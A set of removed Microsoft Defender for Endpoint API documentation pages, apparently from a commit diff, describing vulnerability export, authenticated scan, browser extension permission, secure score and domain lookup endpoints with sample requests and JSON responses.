-RecommendedSecurityUpdate |String|Name or description of the security update provided by the software vendor to address the vulnerability.|April 2020 Security Updates
-RecommendedSecurityUpdateId |String|Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles|4550961
-RegistryPaths |Array[string]|Registry evidence that the product is installed in the device.|["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"]
-SoftwareName|String|Name of the software product.|Chrome
-SoftwareVendor|String|Name of the software vendor.|Google
-SoftwareVersion|String|Version number of the software product.|81.0.4044.138
-Status|String|**New** (for a new vulnerability introduced on a device) (1) **Fixed** (if this vulnerability doesn't exist anymore on the device, which means it was remediated). (2) **Updated** (if a vulnerability on a device has changed. The possible changes are: CVSS score, exploitability level, severity level, DiskPaths, RegistryPaths, RecommendedSecurityUpdate). |Fixed
-VulnerabilitySeverityLevel|String|Severity level that is assigned to the security vulnerability. It's based on the CVSS score.|Medium
-|
-
-#### Clarifications
--- If the software was updated from version 1.0 to version 2.0, and both versions are exposed to CVE-A, you'll receive two separate events:
- 1. Fixed: CVE-A on version 1.0 was fixed.
- 1. New: CVE-A on version 2.0 was added.
--- If a specific vulnerability (for example, CVE-A) was first seen at a specific time (for example, January 10) on software with version 1.0, and a few days later that software was updated to version 2.0 which also exposed to the same CVE-A, you'll receive these two separated events:
- 1. Fixed: CVE-X, FirstSeenTimestamp January 10, version 1,0.
- 1. New: CVE-X, FirstSeenTimestamp January 10, version 2.0.
-
-### 3.6 Examples
-
-#### 3.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilityChangesByMachine?pageSize=5&sinceTime=2021-05-19T18%3A35%3A49.924Z
-```
-
-#### 3.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.DeltaAssetVulnerability)",
- "value": [
- {
- "id": "008198251234544f7dfa715e278d4cec0c16c171_chrome_87.0.4280.88__",
- "deviceId": "008198251234544f7dfa715e278b4cec0c19c171",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_1c8fee370690ca24b6a0d3f34d193b0424943a8b8.DomainPII_0dc1aee0fa366d175e514bd91a9e7a5b2b07ee8e.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.19042.685",
- "osArchitecture": "x64",
- "softwareVendor": "google",
- "softwareName": "chrome",
- "softwareVersion": "87.0.4280.88",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [
- "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
- ],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Google Chrome"
- ],
- "lastSeenTimestamp": "2021-01-04 00:29:42",
- "firstSeenTimestamp": "2020-11-06 03:12:44",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-google-_-chrome",
- "status": "Fixed",
- "eventTimestamp": "2021-01-11T11:06:08.291Z"
- },
- {
- "id": "00e59c61234533860738ecf488eec8abf296e41e_onedrive_20.64.329.3__",
- "deviceId": "00e56c91234533860738ecf488eec8abf296e41e",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_82c13a8ad8cf3dbaf7bf34fada9fa3aebc124116.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.18363.1256",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": "onedrive",
- "softwareVersion": "20.64.329.3",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_USERS\\S-1-5-21-2127521184-1604012920-1887927527-24918864\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OneDriveSetup.exe"
- ],
- "lastSeenTimestamp": "2020-12-11 19:49:48",
- "firstSeenTimestamp": "2020-12-07 18:25:47",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-onedrive",
- "status": "Fixed",
- "eventTimestamp": "2021-01-11T11:06:08.291Z"
- },
- {
- "id": "01aa8c73095bb12345918663f3f94ce322107d24_firefox_83.0.0.0_CVE-2020-26971_",
- "deviceId": "01aa8c73065bb12345918693f3f94ce322107d24",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_42684eb981bea2d670027e7ad2caafd3f2b381a3.DomainPII_21eed80b086e76dbfa178eabfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.19042.685",
- "osArchitecture": "x64",
- "softwareVendor": "mozilla",
- "softwareName": "firefox",
- "softwareVersion": "83.0.0.0",
- "cveId": "CVE-2020-26971",
- "vulnerabilitySeverityLevel": "High",
- "recommendedSecurityUpdate": "193220",
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [
- "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe"
- ],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Mozilla Firefox 83.0 (x86 en-US)"
- ],
- "lastSeenTimestamp": "2021-01-05 17:04:30",
- "firstSeenTimestamp": "2020-05-06 12:42:19",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-mozilla-_-firefox",
- "status": "Fixed",
- "eventTimestamp": "2021-01-11T11:06:08.291Z"
- },
- {
- "id": "026f0fcb12345fbd2decd1a339702131422d362e_project_16.0.13701.20000__",
- "deviceId": "029f0fcb13245fbd2decd1a336702131422d392e",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_a5706750acba75f15d69cd17f4a7fcd268d6422c.DomainPII_f290e982685f7e8eee168b4332e0ae5d2a069cd6.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.19042.685",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": "project",
- "softwareVersion": "16.0.13701.20000",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ProjectProRetail - en-us"
- ],
- "lastSeenTimestamp": "2021-01-03 23:38:03",
- "firstSeenTimestamp": "2019-08-01 22:56:12",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-project",
- "status": "Fixed",
- "eventTimestamp": "2021-01-11T11:06:08.291Z"
- },
- {
- "id": "038df381234510b357ac19d0113ef622e4e212b3_chrome_81.0.4044.138_CVE-2020-16011_",
- "deviceId": "038df381234510d357ac19b0113ef922e4e212b3",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_365f5c0bb7202c163937dad3d017969b2d760eb4.DomainPII_29596a43a2ef2bbfa00f6a16c0cb1d108bc63e32.DomainPII_3c5fefd2e6fda2f36257359404f6c1092aa6d4b8.net",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.18363.1256",
- "osArchitecture": "x64",
- "softwareVendor": "google",
- "softwareName": "chrome",
- "softwareVersion": "81.0.4044.138",
- "cveId": "CVE-2020-16011",
- "vulnerabilitySeverityLevel": "High",
- "recommendedSecurityUpdate": "ADV 200002",
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [
- "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"
- ],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{C4EBFDFD-0C55-3E5F-A919-E3C54949024A}"
- ],
- "lastSeenTimestamp": "2020-12-10 22:45:41",
- "firstSeenTimestamp": "2020-07-26 02:13:43",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-google-_-chrome",
- "status": "Fixed",
- "eventTimestamp": "2021-01-11T11:06:08.291Z"
- }
- ],
- "@odata.nextLink": "https://wpatdadi-eus-stg.cloudapp.net/api/machines/SoftwareVulnerabilitiesTimeline?sincetime=2021-01-11&pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
-}
-```
-
-## See also
--- [Export assessment methods and properties per device](get-assessment-methods-properties.md)-- [Export secure configuration assessment per device](get-assessment-secure-config.md)-- [Export software inventory assessment per device](get-assessment-software-inventory.md)-
-Other related
--- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Authenticated Scan Properties https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-authenticated-scan-properties.md
- Title: Authenticated scan methods and properties
-description: The API response contains Microsoft Defender Vulnerability Management authenticated scans created in your tenant. You can request all the scans, all the scan definitions or add a new network our authenticated scan.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/14/2022--
-# Authenticated scan methods and properties
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## Methods
-
-Method|Description
-:|:|:
-[Get all scan definitions](get-all-scan-definitions.md)|List all scan definitions.
-[Add, delete, or update a scan definition](add-a-new-scan-definition.md)|Add, delete, or update a new scan definition.
-[Get all scan agents](get-all-scan-agents.md)|List all scan agents.
-[Get scan agent by ID](Get-agent-details.md)| Retrieves the details for a specified agent by its ID.
-[Get scan history by definition](get-scan-history-by-definition.md)|List scan definition history.
-[Get scan history by session](get-scan-history-by-session.md)|List scan history for a session.
-
-Learn more about [Windows authenticated scan](../../defender-vulnerability-management/windows-authenticated-scan.md) and [Network authenticated scans](../network-devices.md).
-
-## Properties
-
-Property|Data type|Description
-:|:|:
-id|String| Scan ID.
-scanType|Enum|The type of scan. Possible values are: `Windows`, `Network`.
-scanName|String|Name of the scan.
-isActive|Boolean|Status of whether the scan actively running.
-orgId |String| Related organization ID.
-intervalInHours|Int|The interval at which the scan runs.
-createdBy|String| Unique identity of the user that created the scan.
-targetType|String|The target type in the target field. Possible types are `IP Address` or `Hostname`. Default value is IP Address.
-target|String| A comma separated list of targets to scan, either IP addresses or hostnames.
-scanAuthenticationParams|Object|An object representing the authentication parameters, see [Authentication parameters object properties](#authentication-parameters-object-properties) for expected fields. This property is mandatory when creating a new scan and is optional when updating a scan.
-scannerAgent|Object|An object representing the scanner agent, contains the machine Id of the scanning device.
-
-### Authentication parameters object properties
-
-Property|Data type|Description
-:|:|:
-|@odata.type|Enum|The scan type authentication parameters. Possible values are: `#microsoft.windowsDefenderATP.api.SnmpAuthParams` for `Network` scan type, and `#microsoft.windowsDefenderATP.api.WindowsAuthParams` for `Windows` scan type.|
-|type|Enum|The authentication method. Possible values vary based on @odata.type property. <br/> - If @odata.type is `SnmpAuthParams`, possible values are `CommunityString`, `NoAuthNoPriv`, `AuthNoPriv`, `AuthPriv`. <br/> - If `@odata.type` is `WindowsAuthParams` possible values are `Kerberos` or `Negotiate`.|
-|KeyVaultUrl|String (Optional)|An optional property that specifies from which KeyVault the scanner should retrieve credentials. If KeyVault is specified there's no need to specify username, password.|
-|KeyVaultSecretName|String (Optional)|An optional property that specifies KeyVault secret name from which the scanner should retrieve credentials. If KeyVault is specified there's no need to specify username, password.|
-|Domain|String (Optional)|Domain name when using `WindowsAuthParams`.|
-|Username|String (Optional)|Username when using `WindowsAuthParams` or the username when choosing `SnmpAuthParams` with any type other than `CommunityString`.|
-|IsGMSAUser|Boolean (Optional)|Must be set to true when choosing `WindowsAuthParams`.|
-|CommunityString|String (Optional)|Community string to use when choosing `SnmpAuthParams` with `CommunityString`|
-|AuthProtocol|String (Optional)|Auth protocol to use with `SnmpAuthParams` and `AuthNoPriv` or `AuthPriv`. Possible values are `MD5`, `SHA1`.|
-|AuthPassword|String (Optional)|Auth password to use with `SnmpAuthParams` and `AuthNoPriv` or `AuthPriv`.|
-|PrivProtocol|String (Optional)|Priv protocol to use with `SnmpAuthParams` and `AuthPriv`. Possible values are `DES`, `3DES`, `AES`.|
-|PrivPassword|String (Optional)|Priv password to use with `SnmpAuthParams` and `AuthPriv`.|
-
security Get Browser Extensions Permission Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-browser-extensions-permission-info.md
- Title: Get browser extensions permission info
-description: Retrieves a list of all permissions required for a browser extension
------- m365-security-- tier3-- must-keep--- Previously updated : 06/01/2022--
-# Get browser extensions permission information
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink).
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Retrieves a list of all the permissions requested by a specific browser extension. This is a static data description and would mainly be used to enhance the data returned by the [Export browser extensions assessment API](get-assessment-browser-extensions.md).
-
-By combining these APIs you'll be able to see a description of the permissions requested by the browser extensions that come up in the [Export browser extensions assessment](get-assessment-browser-extensions.md) results.
-
-<br>Supports [OData V4 queries](https://www.odata.org/documentation/).
-<br>OData supported operators:
-<br>```$filter``` on: ```id```, ```name```, ```description```, ```cvssV3```, ```publishedOn```, ```severity```, and ```updatedOn``` properties.
-<br>```$top``` with max value of 10,000.
-<br>```$skip```.
-<br>See examples at [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Software.Read.All|'Read Threat and Vulnerability Management software information'
-Delegated (work or school account)|Software.Read|'Read Threat and Vulnerability Management software information'
-
-## HTTP request
-
-```http
-GET api/browserextensions/permissionsinfo
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the list of all permissions requested by a browser extension in the body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/browserextensions/permissionsinfo
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#BrowserExtension",
- "value": [
-{
- "value": [
- {
- "key": "audioCapture",
- "permissionName": "Capture audio from attached mic or webcam",
- "description": "Capture audio from attached mic or webcam. Could be used to listen in on use."
- },
- {
- "key": "app.window.fullscreen.overrideEsc",
- "permissionName": "Prevent escape button from exiting fullscreen",
- "description": "Can prevent escape button from exiting fullscreen."
- },
- {
- "key": "browsingData",
- "permissionName": "Clear browsing data",
- "description": "Clears browsing data which could result in a forensics/logging issues."
- },
- {
- "key": "content_security_policy",
- "permissionName": "Can manipulate default Content Security Policy (CSP)",
- "description": "CSP works as a block/allow listing mechanism for resources loaded or executed by your extensions. Can manipulate default CSP."
- }
-
- ]
-}
- ]
-```
-
-## See also
--- [Get browser extensions permission info](get-assessment-browser-extensions.md)-- [Browser extensions assessment](../../defender-vulnerability-management/tvm-browser-extensions.md)-
-## Other related
--- [Vulnerability management](../../defender-vulnerability-management/defender-vulnerability-management.md)-- [Vulnerabilities in your organization](../../defender-vulnerability-management/tvm-weaknesses.md)
security Get Device Secure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-device-secure-score.md
- Title: Get the device secure score
-description: Retrieves the organizational device secure score.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get device secure score
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Retrieves your [Microsoft Secure Score for Devices](../tvm-microsoft-secure-score-devices.md). A higher Microsoft Secure Score for Devices means your endpoints are more resilient from cybersecurity threat attacks.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Score.Read.All|'Read Threat and Vulnerability Management score'
-Delegated (work or school account)|Score.Read|'Read Threat and Vulnerability Management score'
-
-## HTTP request
-
-```http
-GET /api/configurationScore
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, with the device secure score data in the response body.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/configurationScore
-```
-
-### Response example
-
-Here is an example of the response.
-
-> [!NOTE]
-> The response list shown here may be truncated for brevity.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#ConfigurationScore/$entity",
- "time": "2019-12-03T09:15:58.1665846Z",
- "score": 340
-}
-```
-
-## See also
--- [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security Get Discovered Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-discovered-vulnerabilities.md
- Title: Get discovered vulnerabilities
-description: Retrieves a collection of discovered vulnerabilities related to a given device ID.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get discovered vulnerabilities
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
---
-## API description
-Retrieves a collection of discovered vulnerabilities related to a given device ID.
-
-## Limitations
-1. Rate limitations for this API are 50 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type | Permission | Permission display name
-:|:|:
-Application |Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
-Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'
-
-## HTTP request
-
-```http
-GET /api/machines/{machineId}/vulnerabilities
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization | String | Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK with the discovered vulnerability information in the body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf44207c4006ed7cc4501/vulnerabilities
-```
-
-### Response
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics.Contracts.PublicAPI.PublicVulnerabilityDto)",
- "value": [
- {
- "id": "CVE-2019-1348",
- "name": "CVE-2019-1348",
- "description": "Git could allow a remote attacker to bypass security restrictions, caused by a flaw in the --export-marks option of git fast-import. By persuading a victim to import specially-crafted content, an attacker could exploit this vulnerability to overwrite arbitrary paths.",
- "severity": "Medium",
- "cvssV3": 4.3,
- "exposedMachines": 1,
- "publishedOn": "2019-12-13T00:00:00Z",
- "updatedOn": "2019-12-13T00:00:00Z",
- "publicExploit": false,
- "exploitVerified": false,
- "exploitInKit": false,
- "exploitTypes": [],
- "exploitUris": []
- }
- ]
-}
-```
-
-## See also
--- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security Get Domain Related Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-domain-related-alerts.md
- Title: Get domain-related alerts API
-description: Learn how to use the Get domain-related alerts API to retrieve alerts related to a given domain address in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get domain-related alerts API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of [Alerts](alerts.md) related to a given domain address.
-
-## Limitations
--- You can query on alerts last updated according to your configured retention period.-- Rate limitations for this API are 100 calls per minute and 1500 calls per hour.-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.Read.All|'Read all alerts'
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account)|Alert.Read|'Read alerts'
-Delegated (work or school account)|Alert.ReadWrite|'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-> - Response will include only alerts, associated with devices, that the user have access to, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/domains/{domain}/alerts
-```
-
-## Request headers
-
-|Header|Value|
-|||
-|Authorization|String|
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and domain exists - 200 OK with list of [alert](alerts.md) entities. If domain does not exist - 200 OK with an empty set.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/domains/client.wns.windows.com/alerts
-```
security Get Domain Related Machines https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-domain-related-machines.md
- Title: Get domain-related machines API
-description: Learn how to use the Get domain-related machines API to get machines that communicated to or from a domain in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get domain-related machines API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves a collection of [Machines](machine.md) that have communicated to or from a given domain address.
-
-## Limitations
-
-1. You can query on devices last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md)
-> - Response will include only devices that the user can access, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/domains/{domain}/machines
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and domain exists - 200 OK with list of [machine](machine.md) entities. If domain doesn't exist - 200 OK with an empty set.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/domains/api.securitycenter.microsoft.com/machines
-```
security Get Domain Statistics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-domain-statistics.md
- Title: Get domain statistics API
-description: Learn how to use the Get domain statistics API to retrieve the statistics on the given domain in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get domain statistics API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves the statistics on the given domain.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-2. The maximum value for `lookbackhours` is 720 hours (30 days).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|URL.Read.All|'Read URLs'
-Delegated (work or school account)|URL.Read.All|'Read URLs'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-
-## HTTP request
-
-```http
-GET /api/domains/{domain}/stats
-```
-
-## Request headers
-
-Header|Value
-:|:
-Authorization|Bearer {token}. **Required**.
-
-## Request URI parameters
-
-Name|Type|Description
-:|:|:
-lookBackHours|Int32|Defines the hours we search back to get the statistics. Defaults to 30 days. **Optional**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and domain exists - 200 OK, with statistics object in the response body. If domain doesn't exist - 200 OK with a prevalence set to 0.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/domains/example.com/stats?lookBackHours=48
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.security.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgDomainStats",
- "host": "example.com",
- "organizationPrevalence": 4070,
- "orgFirstSeen": "2017-07-30T13:23:48Z",
